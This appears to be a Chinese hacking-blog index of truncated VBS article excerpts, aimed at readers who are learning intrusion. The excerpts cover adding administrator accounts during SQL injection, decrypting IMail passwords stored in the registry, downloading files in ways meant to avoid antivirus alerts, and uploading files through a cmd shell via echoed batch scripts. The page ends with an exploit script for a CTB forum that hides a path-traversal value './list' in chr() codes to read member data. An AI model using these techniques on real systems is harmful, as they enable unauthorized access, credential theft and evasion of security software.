作者:lcx
来源:vbs小铺
zzzevazzz在他的名篇<<深入挖掘Windows脚本技术>>的结语中说到:“Windows脚本就像万能胶,能够把独立的程序、服务、控件组合起来完成任务。脚本编程的技巧就是组合的技巧。XP和2003比2000自带更多的命令行工具,WMI也大大加强了,脚本的功能水涨船高,可以说是‘只有想不到,没有做不到’,一切有待你的发掘。”这话很有道理,如果只把VBS看作是一个编程工具,用作写一些方便自己的小工具,对我们学入侵的人来讲则有点浪费其才能了。vbs简单易用,在入侵中用到好的话,会有意想不到的效果,这期就把我日常自己写自己用的三则vbs代码以飨读者。
一、用VBS来加管理员帐号
经常看到有人在论坛上讨论,在注入过程中明明有了sa帐号,但是由于net.exe 阅读全文 »
Tags: VBS
来源:vbs小铺
Imail密码加密算法及VBS实现
Imail的所有邮局信息,比如用户,密码都实际上都是存储在计算机注册表当中的,所以只需要
打开注册表就可以看到Imail里的所有信息,包括用户的密码.
细节:
Imail将企业邮局信息全部存储在:
HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\IMail\Domains\<DOMAINNAME>\Users\<USERNAME>
这样一个键里,其中DomainName是邮局名,UserName是用户名,而在<USERNAME>下有一个名叫Password的键值则是存储的用户密码.密码并不是明文存储的,而是结这了简单的加密运行后生成的,他的加密过程如下:
1.读取用户名,并将其全部转为小写
阅读全文 »
Tags: IMail,
VBS
鬼仔注:一个新的方法,但是缺点是代码有点长了,echo的时候不方便。文中第一段代码可能会被杀毒软件误报,为了避免误会,传到了单独的txt中。
来源:lake2的专栏
说到使用vbs下载文件是不是想到了XMLHTTP呢,呵呵,以下是比较经典的代码:
article_1073_codes.txt
当你把这段代码保存为vbs的时候,杀毒软件可能就开始报警了;而且使用中cscript.exe会访问网络,不太隐蔽。
那么,有没有更好的方法呢?答案很明显:-)
我们可以利用一个叫InternetExplorer.Applica 阅读全文 »
Tags: VBS
来源:zzzevazzz’s blog
XP/2003的netstat有”-o”选项,所以很容易用脚本实现fport的功能。
阅读全文 »
Tags: VBS
来源:zzzevazzz's blog
一个把任何文件转成批处理的脚本。
用Base64编码数据,好处是压缩了大小(相对bin2str而言),缺点是增加处理时间和脚本复杂度。
由于效率瓶颈是在bat生成vbs这一步,所以总的来说还是合算了。
写文件用ADODB.Recordset,比debug好使多了。
大部分事都是脚本做的,批处理只是用echo来生成脚本而已。
echo版的好处是,全选复制粘贴到cmd shell里就把文件上传了。
下面是代码。版面限制,排版有点乱:(
阅读全文 »
Tags: VBS
软件作者:lcx
url=inputbox("请输入ctb论坛地址,例http://www.col-e.net/ylj/ctb")
if url="" then
msgbox ("未输入地址")
wscript.quit
end if
Set oXMLHttpRequest = CreateObject("Msxml2.XMLHTTP")
oXMLHttpRequest.Open "GET", url&"/index.php?mods=member&action=info&id="&chr(46)&chr(47)&chr(108)&chr(105)&chr(115)&chr(116), False, False
oXMLHttpRequest.Send
str=oXMLHttpRequest.ResponseText
Wscript.Echo replace(MID(str,instr 阅读全文 »
Tags: CTB,
VBS